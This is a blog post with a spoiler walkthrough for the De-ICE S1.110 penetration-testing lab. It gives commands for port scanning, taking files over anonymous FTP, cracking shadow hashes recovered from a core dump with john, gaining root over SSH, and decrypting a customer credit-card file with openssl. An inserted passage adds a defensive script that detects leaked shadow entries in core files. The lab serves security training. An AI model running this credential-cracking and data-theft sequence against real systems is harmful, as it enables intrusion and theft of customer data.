While digging through an old external drive I found the De-ICE LiveCDs and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.
Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
Scenario: The scenario for this LiveCD is that a CEO of a small company has tasked you to do more extensive penetration testing of systems within his company. The network administrator has reconfigured systems within his network to meet tougher security requirements and expects you to fail any further penetration attempts. This system is an FTP server used by the network administrator team to create/reload systems on the company intranet. No classified or sensitive information should reside on this server. Through discussion with the administrator, you found out that this server had been used in the past to maintain customer information, but has been sanitized (as opposed to re-built). Prove to the network administrator that proper system configuration is not the only thing critical in securing a server.
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso
Default IP 192.168.1.110
1. create list of open ports
2. create list of users for brute force
3. brute force password for one or more users on an open service
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: obtain customer credit card information
Spoilers and Walkthrough
Change IP – Depending on your configuration you may not need to do this. Log in as root, password is at bottom of page. This assumes that you are using VMware NAT and XX is the third octet of the range you are using.
ifconfig eth0 192.168.XX.110/24
route add default gw 192.168.XX.2
Port Scan the System –
nmap -sV -T4 -O -oX /root/Desktop/deice110 192.168.42.110
Hitting it with a version scan to determine what is running. We are going to output the file as XML and practice using the Metasploit database. You can run it all from inside msfconsole using the db_nmap command and then normal nmap switches, but I’m showing you the import function.
msfconsole
workspace -a deice
workspace deice
This creates a database named deice and sets it as the current working
db_import /root/Desktop/deice110
hosts
You should see the 110 address. WooHoo!
There should be four ports open. Go check out the website because it has info you need.
I love me some FTP, I really love anonymous FTP
Use either the command line or FileZilla to get access to FTP.
I used FileZilla and downloaded everything.
The download/etc/shadow seems promising
John can work with the shadow file without unshadowing it.
Running john against it:
john -rules -wordlist=/usr/share/wordlists/rockyou.txt shadow
john returned a password but it didn’t work.
There is a passwd file in download/opt/cygwin/etc but no shadow file, so moving along.
What is the core file in download/etc?
file core
core: ELF 32-bit LSB core file Intel 80386....
Better Google that: it is a Linux core dump file… go read some on that, we’ll wait.
The end looks like a dump of a shadow file
strings core > /root/desktop/deice/coredump
This gives us a working copy on the desktop. I copied out the info and split it at the usernames. Look at the shadow file from the 100 disk for the normal format; second verse, same as the first.
john -rules -wordlist=/usr/share/wordlists/rockyou.txt coreshadow
This gives us the following users: root, bbanter. SSH to the system and get root.
SSH to the box as bbanter:
ssh email@example.com
su -
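Seen from the administrator's side, the core file is the real finding: a crash dump left on the anonymous FTP share still carried shadow entries. The check below is an added example, not part of the original walkthrough; it recognises an ELF core by its header and reports which accounts have shadow-style hashes inside a file, without echoing the hashes. The function names and the sample bytes are constructed for illustration.

```python
import re
import struct

# name:$id$salt$hash: as stored in /etc/shadow (modular crypt format)
SHADOW_RE = re.compile(
    rb"([a-z_][a-z0-9_-]{0,31}):\$([0-9a-z]{1,2})\$"
    rb"[./A-Za-z0-9]{1,16}\$([./A-Za-z0-9]{22,86}):"
)
SCHEMES = {b"1": "md5crypt", b"5": "sha256crypt", b"6": "sha512crypt"}


def is_elf_core(blob: bytes) -> bool:
    """True if blob starts with an ELF header whose e_type is ET_CORE (4)."""
    if len(blob) < 18 or blob[:4] != b"\x7fELF":
        return False
    endian = "<" if blob[5] == 1 else ">"  # EI_DATA: 1 = LSB, 2 = MSB
    (e_type,) = struct.unpack_from(endian + "H", blob, 16)
    return e_type == 4


def leaked_accounts(blob: bytes):
    """List (offset, user, scheme) per shadow-style entry; hashes are not returned."""
    found = []
    for m in SHADOW_RE.finditer(blob):
        scheme = SCHEMES.get(m.group(2), "crypt id " + m.group(2).decode())
        found.append((m.start(), m.group(1).decode(), scheme))
    return found


def audit(name: str, blob: bytes) -> dict:
    """Summarise one file from a share before it is published."""
    hits = leaked_accounts(blob)
    return {"file": name, "elf_core": is_elf_core(blob),
            "accounts": sorted({user for _, user, _ in hits}),
            "publishable": not hits}


# Constructed sample: 32-bit LSB ELF header with e_type = ET_CORE, filler bytes,
# then two made-up shadow entries run together the way they sit in process memory.
_HDR = b"\x7fELF\x01\x01\x01" + b"\x00" * 9 + struct.pack("<HH", 4, 3)
_FAKE = b"A" * 22  # placeholder, not a real hash
SAMPLE_CORE = (_HDR + b"\x00" * 64 + b"root:$1$constrct$" + _FAKE + b":13574:0:::::"
               + b"bbanter:$1$constrct$" + _FAKE + b":13571:0:99999:7:::\x00")

if __name__ == "__main__":
    print(audit("etc/core", SAMPLE_CORE))
    print(audit("etc/motd", b"Welcome to the FTP server\n"))
```

Run over every file under a share before it goes live; any file reported with `publishable: False` should be removed and the listed accounts given new passwords.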
From the 100 disk we know that .enc files are encrypted and we are looking for credit card data so why not try to find that again.
cd /
find -iname '*.enc'
That pukes back a lot of things but look at:
Jump back to the openssl decrypt if you need help:
openssl list-cipher-commands
openssl enc -aes-128-cbc -d -in /home/root/.save/customer_account.csv.enc -out customer_account.csv
WAIT NO JOY!
Let’s go look at the /home/root/.save folder
cd /home/root/.save
ls
Look at the copy.sh script
This is the script that encrypted the file, the pass is in the “file” section. Let’s decrypt it now:
openssl enc -d -aes-256-cbc -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
cat customer_account.csv
BOOM you’re done. OpenSSL is a pain but now you’re a pro.